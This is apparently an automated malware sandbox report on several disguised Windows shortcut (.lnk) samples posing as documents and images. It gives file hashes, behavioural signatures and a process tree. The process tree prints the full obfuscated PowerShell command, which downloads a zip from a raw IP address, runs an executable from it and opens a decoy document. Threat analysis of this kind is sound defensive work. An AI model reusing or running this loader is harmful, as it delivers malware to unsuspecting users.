Overview
overview
10Static
static
1brt_1_0147.doc.lnk
windows7-x64
3brt_1_0147.doc.lnk
windows10-2004-x64
10oshad_88.docx.lnk
windows7-x64
3oshad_88.docx.lnk
windows10-2004-x64
10rv_luti_20...sx.lnk
windows7-x64
3rv_luti_20...sx.lnk
windows10-2004-x64
10telegrama_...pg.lnk
windows7-x64
3telegrama_...pg.lnk
windows10-2004-x64
10Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
06-09-2024 11:25
Static task
static1
Behavioral task
behavioral1
Sample
brt_1_0147.doc.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
brt_1_0147.doc.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
oshad_88.docx.lnk
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
oshad_88.docx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
rv_luti_2024_roku.xlsx.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
telegrama_ksv_po_btgr.jpg.lnk
Resource
win7-20240903-en
General
-
Target
brt_1_0147.doc.lnk
-
Size
47KB
-
MD5
7f054fb90b37b4c6fa4ede910ee7425d
-
SHA1
f48454623fdb37da7797b43720e372926d6eca9d
-
SHA256
68fe63cdae0b90cd1df1d400879135d3c18522c98cf4a9473156b477a71529ce
-
SHA512
8f82f94ccba2034bec30a811de4cb04789dbbdfbe5a19479e65f6d58f5ab3e93717ecffb18a73a052b00b840bcd8beaa2f8c70bbd95a4e93c58bcea96bb32efb
-
SSDEEP
48:88muavUQSe9EGQwdfxvUZ7CFKxCI5BevUZ7vXRddCZZGXu/dZZIa7x:88y8MzdfxSxCIGuXRuqQ
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2740 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2320 wrote to memory of 2740 2320 cmd.exe 32 PID 2320 wrote to memory of 2740 2320 cmd.exe 32 PID 2320 wrote to memory of 2740 2320 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\brt_1_0147.doc.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo AndrfIhHlfnvKIhtnvYeqrAhmqLVwWJdoZlnqRyQvVyeaUwiaVcZTANG; echo zXMWRScaFTWIFOjLSXcfSRSTbmcsRQhjyNThYhe; echo OdjlPKboxgbXDOhZAdfzQBNtIOKUdvtxsMOxZfhUDhNKnBZGiU; if (-not(Test-Path 'glorytoukraine.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/glorytoukraine.zip -OutFile glorytoukraine.zip}; echo YALlpWtPrIfNILIjixMVhnRHZhqAGvmeJkeGerStfmUCITNZvaFP; Expand-Archive -Path glorytoukraine.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/scr_previw.exe; echo xQVQdHjoZNMewzivMdVmrBYIIbjxAEunTwzhWADkAGoxQpGNXpbRgtNoT; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''t''p'':''/''/''5''.''18''1''.''1''56''.''117''/racs/brt_1_0147.doc -OutFile brt_1_0147.doc; echo sZXucWxIFfxCRlJoHaFxHVohDmYnMQgzycveSVaznWDmahqifS; s''t''a''rt brt_1_0147.doc2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2740
-